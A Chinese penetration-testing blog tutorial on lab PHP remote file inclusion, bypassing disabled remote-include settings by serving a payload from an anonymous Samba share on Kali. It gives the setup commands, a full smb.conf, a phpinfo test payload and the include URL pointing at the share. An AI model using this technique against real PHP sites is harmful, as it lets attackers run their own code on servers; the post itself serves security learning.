博主昵称:跳楼梯企鹅
创作初心:本博客的初心为与技术朋友们相互交流,每个人的技术都存在短板,博主也是一样,虚心求教,希望各位技术友给予指导。
博主座右铭:发现光,追随光,成为光,散发光;
博主研究方向:渗透测试、机器学习 ;
博主寄语:感谢各位技术友的支持,您的支持就是我前进的动力 ;
一、什么是smb服务?
SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。说白了就是文件共享
二、实验开始
利用samba服务来绕过include没有开启两个配置的限制,实操截图
1.打开kail
2.远程访问测试
这里很明显,无法包含,那么怎么就要用到其他方式
3.打开apache2服务
4.下载samba服务
如果显示下图,说明安装成功
5.创建一个共享文件
命令:mkdir pub
6.给文件夹赋予权限
命令:chmod 0555 pub
命令:chown -R nobody:nogroup pub
7.清空配置文件
代码:echo > /etc/samba/smb.conf
8.编译samba服务
内容:
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
上面内容为匿名访问,也就是说不用账号密码就可以进行访问
9.重启samba
命令:service smbd restart
Windows下打开cmd 测试
成功之后显示
10.分析
这里ica文件对应的其实就是kail系统上的pub文件
11.在pub文件下创建一个phpinfo文件
代码:vi phpinfo.txt
内部输入:<?php phpinfo();?>
12.我们来看下文件ica文件内是不是更新了
发现确实是更新了
13.开始利用
Url:http://127.0.0.1/shine/a.php?b=//虚拟机ip/ica/phpinfo.txt
发现可以不开启远程文件包含的文件,也是可以通过samba服务进行远程文件包含